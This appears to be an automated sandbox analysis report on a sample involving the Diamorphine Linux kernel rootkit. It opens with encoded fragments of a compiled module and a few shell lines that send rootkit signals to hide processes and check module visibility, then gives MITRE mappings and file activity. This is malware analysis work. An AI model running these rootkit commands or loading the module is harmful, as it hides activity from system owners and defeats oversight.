AAAAAAAAAAAAAAAAAAAAAAAAAGRpYW1vcnBoaW5lLm1vZC5jAF9fVU5JUVVFX0lEX3NyY3ZlcnNp
AAAAAAAAAAAAAAAApwAAAAIAAwAAAAAAAAAAAEcAAAAAAAAAuwAAAAIAAwBQAAAAAAAAABAAAAAA
AAAAAAAAAAAAAAAs8vHOAAAAAGluaXRfdGFzawAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
.fini
AAAGBgAAAAAAAAIAAAAOAAAABAAAAAAAAAARBgAAAAAAAAQAAAAxAAAA/P////////8YBgAAAAAA
//+UAwAAAAAAAAQAAAA7AAAA/P////////+cAwAAAAAAAAQAAAAwAAAA/P/////////nAwAAAAAA
.init_array
_edata
AAAAAAAAAABTBQAAAAAAAAsAAAA1AAAAyAcAAAAAAABhBQAAAAAAAAQAAAA/AAAA/P////////9/
AAAAAAAAngEAAAEADgAlAAAAAAAAABUAAAAAAAAAtQEAAAAACwATAAAAAAAAAAAAAAAAAAAAugEA
__cxa_finalize
ZGlhbW9ycGhpbmUuYwBpc19pbnZpc2libGUucGFydC4wAGt6YWxsb2MuY29uc3Rwcm9wLjAAaGFj
BAAAAAAAAAsAAAA1AAAAAAAAAAAAAABKBAAAAAAAAAsAAAA1AAAAyAcAAAAAAABhBAAAAAAAAAQA
AAAIAQAAAAAAABgAAAAJAAAACAAAAAAAAAAYAAAAAAAAAHcAAAABAAAAMgAAAAAAAAAAAAAAAAAA
crtstuff.c
AAAIAAAAAAAAABgAAAAAAAAACQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAkBgAAAAAAAAdAwAAAAAA
AAAAAAAAAAAAAAAAAFUAAAAEAAAAQAAAAAAAAAAAAAAAAAAAAGgkAAAAAAAAkAAAAAAAAAAYAAAA
perror
WAIAABAAAAAAAAAAAAAAAAAAAAAAAAAAZgIAABAAAAAAAAAAAAAAAAAAAAAAAAAAewIAABIAAwAQ
AAAwAAAA/P////////8XAgAAAAAAAAQAAAAtAAAA/P////////8xAgAAAAAAAAQAAAAxAAAA/P//
AAAAAAAAAAAAAAAAAAAAAAAAGAIAABIABQAAAAAAAAAAACcBAAAAAAAAJAIAABAAAAAAAAAAAAAA
AAAAAAAAAAAAsBsAAAAAAAB4BgAAAAAAABgAAAADAAAACAAAAAAAAAAYAAAAAAAAAEoAAAABAAAA
AAAADAAAAAAAAAD1BQAAAAAAAAIAAAAsAAAABAAAAAAAAAD8BQAAAAAAAAsAAAAsAAAACAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAowADCQAAAAAAAAAAowADCQAAAAAAAAAA
__dso_handle
b240MgBfX1VOSVFVRV9JRF9kZXBlbmRzNDEAX19fX3ZlcnNpb25zAF9fVU5JUVVFX0lEX3JldHBv
GLIBC_2.2.5
__libc_start_main
_2.4
bml0AF9fc3lzX2NhbGxfdGFibGUAZGlhbW9ycGhpbmVfY2xlYW51cABfX1VOSVFVRV9JRF9kZXNj
AAAAAAQAAAAqAAAA/P////////+eAgAAAAAAAAQAAAArAAAA/P////////+vAgAAAAAAAAsAAAA5
X3RhYmxlAC5yZWxhLmdudS5saW5rb25jZS50aGlzX21vZHVsZQAuYnNzAC5jb21tZW50AC5ub3Rl
/lib64/ld-linux-x86-64.so.2
AAAAAAAAAAAAAAAAAAAAAAAAu237vQAAAABfX2ZlbnRyeV9fAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAPUAAAABAAAAAAAAAAAAAAAAAAAAAAAAABgSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAA
.dynamic
.strtab
AAAAAAAASMeCyAYAAAAAAABIx4LwAQAAAAAAAA8iwEUxwEiLRfhlSDMEJSgAAAB0BegAAAAAyUSJ
kill -31 $(pgrep -f suspicious.sh)
sleep 10
R1BMAHNyY3ZlcnNpb249RDIzNzZDNzdEMEIwOEI1MDY3RjlDRkIAZGVwZW5kcz0AcmV0cG9saW5l
kill -63 0
AAAAAACmAAAAAQAAAAIAAAAAAAAAAAAAAAAAAADgCQAAAAAAAEAEAAAAAAAAAAAAAAAAAAAgAAAA
AAQAAAAwAAAA/P////////+aAAAAAAAAAAIAAAAOAAAALAAAAAAAAAChAAAAAAAAAAIAAAAsAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAcAAAACAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAkAAAA
__GNU_EH_FRAME_HDR
__gmon_start__
AAEADgCDAAAAAAAAADcAAAAAAAAAkQAAAAEAAgAAAAAAAAAAABgAAAAAAAAAmQAAAAQA8f8AAAAA
libc.so.6
bGluZTQwAF9fVU5JUVVFX0lEX25hbWUzOQBfX1VOSVFVRV9JRF92ZXJtYWdpYzM4AF9ub3RlXzYA
LkdOVS1zdGFjawAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
.note.gnu.property
AAAAAAAAoAIAABAAAAAAAAAAAAAAAAAAAAAAAAAArgIAABAAAAAAAAAAAAAAAAAAAAAAAAAAtQIA
popen
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAR0NDOiAoVWJ1bnR1IDku
QA4AAAAAAACAAwAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAMgAAAAEAAAAQAAAAAAAAAAA
ANMIAAAAAAAAPgAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAACLAAAAAQAAAAIAAAAAAAAA
AAAAAAAAAAAAAAAAAAIAAAADAAAAJAIAAAAAAAAEAAAAAAAAAAIAAAApAAAABAAAAAAAAAAMAAAA
AAAAAIXAD4XuAAAAZUiLBCUAAAAASIuAyAoAAE1j7UUx0kiLQCBIi0AISosE6EiLQBhIi0AwSIN4
lsmod > diamorphine-invisible.txt
frame_dummy
ZV9zaG93AF9fa21hbGxvYwAAAAABAAAAAAAAAAQAAAAxAAAA/P////////8JAAAAAAAAAAsAAAA1

Defense Evasion
  • T1070 - Indicator Removal
    • deletes_files
  • T1070.004 - File Deletion
    • deletes_files

Usage

Processing ( 1.64 seconds )

  • 1.516 CAPE
  • 0.057 StraceAnalysis
  • 0.051 TraceeAnalysis
  • 0.007 Heatmap
  • 0.003 AnalysisInfo
  • 0.002 NetworkAnalysis

Signatures ( 0.00 seconds )

Reporting ( 2.74 seconds )

  • 2.687 MITRE_TTPS
  • 0.044 ReportHTML
  • 0.004 JsonDump
  • 0.002 LiteReport

Signatures

Reads files from disk
ReadFile: /lib/x86_64-linux-gnu/libc.so.6
ReadFile: /lib/x86_64-linux-gnu/libtinfo.so.6
ReadFile: STDIN
ReadFile: /etc/ld.so.cache
ReadFile: /lib/x86_64-linux-gnu/libzstd.so.1
ReadFile: /lib/x86_64-linux-gnu/liblzma.so.5
ReadFile: /lib/x86_64-linux-gnu/libcrypto.so.3
ReadFile: /lib/modules/6.5.0-18-generic/modules.softdep
ReadFile: /proc/cmdline
ReadFile: /tmp7_5yn7x6/diamorphine.ko
ReadFile: /proc/modules
ReadFile: /sys/module/veth/refcnt
ReadFile: coresize
ReadFile: /sys/module/xt_conntrack/refcnt
ReadFile: /sys/module/nft_chain_nat/refcnt
ReadFile: /sys/module/xt_MASQUERADE/refcnt
ReadFile: /sys/module/nf_nat/refcnt
ReadFile: /sys/module/nf_conntrack_netlink/refcnt
ReadFile: /sys/module/nf_conntrack/refcnt
ReadFile: /sys/module/nf_defrag_ipv6/refcnt
ReadFile: /sys/module/nf_defrag_ipv4/refcnt
ReadFile: /sys/module/xfrm_user/refcnt
ReadFile: /sys/module/xfrm_algo/refcnt
ReadFile: /sys/module/xt_addrtype/refcnt
ReadFile: /sys/module/nft_compat/refcnt
ReadFile: /sys/module/nf_tables/refcnt
ReadFile: /sys/module/libcrc32c/refcnt
ReadFile: /sys/module/nfnetlink/refcnt
ReadFile: /sys/module/br_netfilter/refcnt
ReadFile: /sys/module/bridge/refcnt
ReadFile: /sys/module/stp/refcnt
ReadFile: /sys/module/llc/refcnt
ReadFile: /sys/module/overlay/refcnt
ReadFile: /sys/module/snd_hda_codec_generic/refcnt
ReadFile: /sys/module/ledtrig_audio/refcnt
ReadFile: /sys/module/snd_hda_intel/refcnt
ReadFile: /sys/module/snd_intel_dspcfg/refcnt
ReadFile: /sys/module/snd_intel_sdw_acpi/refcnt
ReadFile: /sys/module/snd_hda_codec/refcnt
ReadFile: /sys/module/snd_hda_core/refcnt
ReadFile: /sys/module/binfmt_misc/refcnt
ReadFile: /sys/module/snd_hwdep/refcnt
ReadFile: /sys/module/kvm_amd/refcnt
ReadFile: /sys/module/ccp/refcnt
ReadFile: /sys/module/nls_iso8859_1/refcnt
ReadFile: /sys/module/snd_pcm/refcnt
ReadFile: /sys/module/kvm/refcnt
ReadFile: /sys/module/irqbypass/refcnt
ReadFile: /sys/module/crct10dif_pclmul/refcnt
ReadFile: /sys/module/snd_seq_midi/refcnt
ReadFile: /sys/module/polyval_clmulni/refcnt
ReadFile: /sys/module/snd_seq_midi_event/refcnt
ReadFile: /sys/module/polyval_generic/refcnt
ReadFile: /sys/module/ghash_clmulni_intel/refcnt
ReadFile: /sys/module/aesni_intel/refcnt
ReadFile: /sys/module/snd_rawmidi/refcnt
ReadFile: /sys/module/crypto_simd/refcnt
ReadFile: /sys/module/cryptd/refcnt
ReadFile: /sys/module/snd_seq/refcnt
ReadFile: /sys/module/input_leds/refcnt
ReadFile: /sys/module/snd_seq_device/refcnt
ReadFile: /sys/module/snd_timer/refcnt
ReadFile: /sys/module/serio_raw/refcnt
ReadFile: /sys/module/snd/refcnt
ReadFile: /sys/module/soundcore/refcnt
ReadFile: /sys/module/qxl/refcnt
ReadFile: /sys/module/drm_ttm_helper/refcnt
ReadFile: /sys/module/ttm/refcnt
ReadFile: /sys/module/qemu_fw_cfg/refcnt
ReadFile: /sys/module/drm_kms_helper/refcnt
ReadFile: /sys/module/mac_hid/refcnt
ReadFile: /sys/module/sch_fq_codel/refcnt
ReadFile: /sys/module/msr/refcnt
ReadFile: /sys/module/parport_pc/refcnt
ReadFile: /sys/module/ppdev/refcnt
ReadFile: /sys/module/drm/refcnt
ReadFile: /sys/module/lp/refcnt
ReadFile: /sys/module/parport/refcnt
ReadFile: /sys/module/efi_pstore/refcnt
ReadFile: /sys/module/ip_tables/refcnt
ReadFile: /sys/module/x_tables/refcnt
ReadFile: /sys/module/autofs4/refcnt
ReadFile: /sys/module/crc32_pclmul/refcnt
ReadFile: /sys/module/ahci/refcnt
ReadFile: /sys/module/libahci/refcnt
ReadFile: /sys/module/psmouse/refcnt
ReadFile: /sys/module/i2c_i801/refcnt
ReadFile: /sys/module/e1000/refcnt
ReadFile: /sys/module/i2c_smbus/refcnt
ReadFile: /sys/module/lpc_ich/refcnt
Drops files onto disk
DroppedFile: diamorphine.ko
DroppedFile: diamorphine-invisible.txt
Writes to files on disk
WriteFile: STDOUT
WriteFile: diamorphine.ko
WriteFile: diamorphine-invisible.txt
Tracee: Kernel Modules and Extensions, MITRE T1547.006
Details: Check the Tracee tab for more information and to download the kernel modules.
Deletes files from disk
DeletedFile: "diamorphine.ko"
DeletedFile: "diamorphine-invisible.txt"

Screenshots

No screenshots available.
No playback available.

Hosts

No hosts contacted.

DNS

No domains contacted.

Summary

No results
Sorry! No behavior.
Sorry! No tracee.
Sorry! No strace.
Sorry! No tracee.

No hosts contacted.

No TCP connections recorded.

No UDP connections recorded.

No domains contacted.

HTTP Requests

No HTTP(s) requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No Suricata Extracted files.
Sorry! No dropped files.
Sorry! No process dumps.